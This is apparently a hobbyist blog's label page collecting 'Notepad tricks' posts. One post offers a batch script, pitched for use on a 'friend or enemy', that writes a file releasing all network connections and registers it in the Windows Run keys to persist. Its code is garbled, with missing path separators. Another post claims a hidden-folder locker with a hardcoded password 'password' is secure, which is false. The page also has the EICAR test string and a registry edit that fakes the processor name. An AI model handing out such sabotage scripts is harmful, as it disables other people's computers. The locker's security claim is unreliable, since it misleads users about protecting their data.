Showing posts with label Cool Notepad Tricks. Show all posts
Showing posts with label Cool Notepad Tricks. Show all posts

Make Your Own Easy & Secured Custom Folder

Make Your Own Easy & Secured Custom Folder
Friends all we have some types of data that we dont have to show to others and just want to hide them for hiding our data. Today many third parties software are available online but we need to purchase/download it. After all the third parties software which you will purchase that will not much secure and genuine.
  I will show you how to make your own easy & secured custom folder with easy step. even a just normal person can do this no need of doing P.H.D in coding. just follow the steps which i am giving bellow.

How to make:-  

Just copy the bellow code and paste itto notepad and save it with any name with extension .bat
eg :-Locker.bat  

Code:-

cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDPrivate
:CONFIRM
echo Do You Want To Lock The Folder? Answer In (Y/N)...!!
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid Choice...!!
pause
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder Locked...!!
goto End
:UNLOCK
echo Enter Password To Unlock Folder...!!
set/p "pass=>"
if NOT %pass%==password goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked Successfully...!!
goto End
:FAIL
echo Invalid Password...!!
pause
goto end
:MDPrivate
md Private
echo Private Created Successfully...!!
pause
goto End
:End
Read More

How to MakeVirus which can Disable Internet Permanently


How to MakeVirus which can Disable Internet Permanently
If you want your friend or enemy to disable internet permanently on his computer here it is. To do this follow these simple steps :
1) Open Notepad.

2) Copy and Paste the following Code into Notepad :
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat reg
add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d :windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED! PAUSE

3) Save it as Hackingtipsandtricks.bat.

4) Now it is done.

5)Enjoy
Read More

Top 5 Cool Notepad Tricks


notepad tricks
I had previously share some Interesting computer tricks as well as cool Batch file programs. In this post i will share with you guys some of the cool notepad tricks.As name suggest you don't require any program other then notepad. So lets get started.

1. World Trade Center Attack Trick

world trade center trick


The flight number  of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.
Read More

Matrix Effect Using Notepad



        This is amazing notepad trick which will display matrix effect like you might have seen in movies, that is numbers flashes in green colour. Basically we will be creating a small batch file in notepad.

  • Go to Notepad and copy below codes

Read More

World Trade Center Attack Trick On Notepad



            As some of you might be knowing that the flight number of the plane that had hit World Trade Center on that dreadful day (9/11) was Q33NY. Now call this trick a coincidence or anything else but whatever it is, it does startle us. you will be definately amazed by the this trick.

  • First open Notepad.
  • Type “Q33N” (without quotes) in capital letters.
  • Increase the font size to 72.
  • Change the Font to Wingdings.
Read More

Check your PC is Male or Female

I hope you'll enjoy it. This trick will help you to know the gender of your PC  This trick will tell you that your PC is male or female. Here are some simple steps which can help you to understand this trick.

STEP 1:-
Open notepad in your PC.



STEP 2:-
Now  type follow code in notepad

CreateObject("SAPI.SpVoice").Speak"i love you"
STEP 3:-
Save the file as gender.vbs on your desktop

STEP 4:-
Now click on this saved file & check in which voice your computer says i love you.

Read More

check that your antivirus is real or fake


Today we have one new trick for you to check your antivirus. This trick will help you check that your antivirus is real or fake or you can say that your antivirus is working or not , here are some steps just follow them and enjoy.
1.)
First of all press
 WINDOWS KEY + R to open run command and write NOTEPAD here to open notepad.


2.)
Now copy and paste the below code into your notepad.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*




 
3.)
After that press
 CTRL + S to save this file, here save this file as HTT.vbs on your DESKTOP




4.)
If your antivirus is real then it can allow you to save this file on your desktop i.e. It will detect as virus and delete it and if your antivirus is fake then it will allow you  to save this file.



Read More

change proceser name permanently


  • Open Notepad and paste the following code below:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]
"ProcessorNameString"="My Processor name 50000MHz"
(Change My Processor name with your desired value)



  • Now save this file as <FileName>.reg.


Read More
Related Posts Plugin for WordPress, Blogger...
Powered by Blogger.

IP

About Me

Founder & Author: My name is Sumit Pandey i am the one behind http://hackingtipsandtricks11.blogspot.in/ . I share tips and tricks on Computer ,making ,mobile tips internet tips and ,more you will get all the online tips you need from this website connect with me on facebook.com
...Read More

Support Us

Review hackingtipsandtricks11.blogspot.in on alexa.com DMCA.com Google+

Followers